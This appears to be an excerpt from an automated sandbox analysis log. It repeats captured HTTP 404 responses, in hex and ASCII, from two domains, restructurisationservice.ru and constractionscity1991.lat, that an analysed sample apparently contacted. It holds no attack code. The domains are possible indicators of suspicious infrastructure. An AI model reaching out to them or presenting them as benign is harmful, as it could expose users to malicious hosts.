                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:32 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:33 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:36 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:38 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:42 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:43 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:47 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:49 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:56 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 09:59:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:00:05 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:00:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:00:15 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:00:16 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:00:23 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:00:24 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 19 Dec 2024 10:00:31 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 